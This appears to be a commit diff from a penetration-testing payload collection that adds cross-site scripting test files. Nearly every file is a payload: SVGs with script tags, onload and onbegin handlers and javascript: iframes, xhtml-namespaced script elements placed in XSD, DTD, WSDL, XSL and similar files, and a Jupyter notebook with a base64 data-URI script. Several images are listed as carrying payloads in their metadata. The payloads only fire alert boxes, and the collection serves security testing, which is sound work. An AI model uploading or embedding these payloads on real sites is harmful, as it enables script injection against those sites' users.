Deployed 3ca2ece with MkDocs version: 1.6.1
BIN
XSS Injection/Files/InsecureFlashFile.swf
Normal file
32
XSS Injection/Files/JupyterNotebookXSS.ipynb
Normal file
@@ -0,0 +1,32 @@
|
||||
{
|
||||
"cells": [
|
||||
{
|
||||
"cell_type": "markdown",
|
||||
"metadata": {},
|
||||
"source": [
|
||||
"[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n"
|
||||
]
|
||||
}
|
||||
],
|
||||
"metadata": {
|
||||
"kernelspec": {
|
||||
"display_name": "Python 3",
|
||||
"language": "python",
|
||||
"name": "python3"
|
||||
},
|
||||
"language_info": {
|
||||
"codemirror_mode": {
|
||||
"name": "ipython",
|
||||
"version": 3
|
||||
},
|
||||
"file_extension": ".py",
|
||||
"mimetype": "text/x-python",
|
||||
"name": "python",
|
||||
"nbconvert_exporter": "python",
|
||||
"pygments_lexer": "ipython3",
|
||||
"version": "3.6.2"
|
||||
}
|
||||
},
|
||||
"nbformat": 4,
|
||||
"nbformat_minor": 2
|
||||
}
|
||||
1
XSS Injection/Files/SVG_XSS1.svg
Normal file
@@ -0,0 +1 @@
|
||||
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
|
||||
|
After Width: | Height: | Size: 62 B |
1
XSS Injection/Files/SVG_XSS2.svg
Normal file
@@ -0,0 +1 @@
|
||||
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
|
||||
|
After Width: | Height: | Size: 80 B |
1
XSS Injection/Files/SVG_XSS3.svg
Normal file
@@ -0,0 +1 @@
|
||||
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
|
||||
|
After Width: | Height: | Size: 64 B |
9
XSS Injection/Files/SVG_XSS_green_triangle.svg
Normal file
@@ -0,0 +1,9 @@
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
|
||||
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
|
||||
<script type="text/javascript">
|
||||
alert(document.domain);
|
||||
</script>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 379 B |
3
XSS Injection/Files/SVG_XSS_nested_img_xlink.svg
Normal file
@@ -0,0 +1,3 @@
|
||||
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<image xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg" height="200" width="200"/>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 213 B |
10
XSS Injection/Files/SVG_XSS_nested_svg.svg
Normal file
@@ -0,0 +1,10 @@
|
||||
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<svg x="10">
|
||||
<rect x="10" y="10" height="100" width="100" style="fill: #002654"/>
|
||||
<script type="text/javascript">alert('sub-svg 1');</script>
|
||||
</svg>
|
||||
<svg x="200">
|
||||
<rect x="10" y="10" height="100" width="100" style="fill: #ED2939"/>
|
||||
<script type="text/javascript">alert('sub-svg 2');</script>
|
||||
</svg>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 413 B |
3
XSS Injection/Files/SVG_XSS_nested_use_xlink.svg
Normal file
@@ -0,0 +1,3 @@
|
||||
<svg width="200" height="200" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
|
||||
<use xlink:href="http://127.0.0.1:9999/red_lightning_xss_full.svg#lightning"/>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 196 B |
15
XSS Injection/Files/SVG_XSS_red_lightning.svg
Normal file
@@ -0,0 +1,15 @@
|
||||
<?xml version="1.0" standalone="no"?>
|
||||
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||
<svg version="1.1" baseProfile="full" width="100" height="100" xmlns="http://www.w3.org/2000/svg" onload="alert('svg attribut')">
|
||||
<polygon id="lightning" points="0,100 50,25 50,75 100,0" fill="#ff1919" stroke="#ff0000"/>
|
||||
<desc><script>alert('svg desc')</script></desc>
|
||||
<foreignObject><script>alert('svg foreignObject')</script></foreignObject>
|
||||
<foreignObject width="500" height="500">
|
||||
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert('svg foreignObject iframe');" width="400" height="250"/>
|
||||
</foreignObject>
|
||||
<title><script>alert('svg title')</script></title>
|
||||
<animatetransform onbegin="alert('svg animatetransform onbegin')"></animatetransform>
|
||||
<script type="text/javascript">
|
||||
alert('svg script');
|
||||
</script>
|
||||
</svg>
|
||||
|
After Width: | Height: | Size: 895 B |
BIN
XSS Injection/Files/SWF_XSS.swf
Normal file
BIN
XSS Injection/Files/mouseover-xss-ecs.jpeg
Normal file
|
After Width: | Height: | Size: 1.1 KiB |
BIN
XSS Injection/Files/onclick-xss-ecs.jpeg
Normal file
|
After Width: | Height: | Size: 1.1 KiB |
BIN
XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg
Normal file
|
After Width: | Height: | Size: 32 KiB |
BIN
XSS Injection/Files/payload_in_all_known_exif_corrupted.png
Normal file
|
After Width: | Height: | Size: 44 KiB |
BIN
XSS Injection/Files/payload_in_all_known_metadata.jpg
Normal file
|
After Width: | Height: | Size: 28 KiB |
BIN
XSS Injection/Files/payload_in_all_known_metadata.png
Normal file
|
After Width: | Height: | Size: 39 KiB |
BIN
XSS Injection/Files/payload_text_xss.png
Normal file
|
After Width: | Height: | Size: 27 KiB |
1
XSS Injection/Files/xml.xsd
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.cer
Normal file
@@ -0,0 +1 @@
|
||||
<script>alert(1)</script>
|
||||
1
XSS Injection/Files/xss.dtd
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.htm
Normal file
@@ -0,0 +1 @@
|
||||
<script>alert(1)</script>
|
||||
1
XSS Injection/Files/xss.html.demo
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.hxt
Normal file
@@ -0,0 +1 @@
|
||||
<script>alert(1)</script>
|
||||
1
XSS Injection/Files/xss.mno
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1337)</a:script>
|
||||
1
XSS Injection/Files/xss.rdf
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.svgz
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
3
XSS Injection/Files/xss.url.url
Normal file
@@ -0,0 +1,3 @@
|
||||
<html>
|
||||
<script>alert(document.domain)</script>
|
||||
</html>
|
||||
1
XSS Injection/Files/xss.vml
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.wsdl
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.xht
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.xhtml
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
18
XSS Injection/Files/xss.xml
Normal file
@@ -0,0 +1,18 @@
|
||||
<html>
|
||||
<head></head>
|
||||
<body>
|
||||
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
|
||||
<info>
|
||||
<name>
|
||||
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
|
||||
</name>
|
||||
<description>
|
||||
<value>Hello</value>
|
||||
</description>
|
||||
<url>
|
||||
<value>http://google.com</value>
|
||||
</url>
|
||||
</info>
|
||||
</body>
|
||||
</html>
|
||||
1
XSS Injection/Files/xss.xsd
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.xsf
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.xsl
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
1
XSS Injection/Files/xss.xslt
Normal file
@@ -0,0 +1 @@
|
||||
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script>
|
||||
BIN
XSS Injection/Files/xss_comment_exif_metadata_double_quote.png
Normal file
|
After Width: | Height: | Size: 12 KiB |
BIN
XSS Injection/Files/xss_comment_exif_metadata_single_quote.png
Normal file
|
After Width: | Height: | Size: 12 KiB |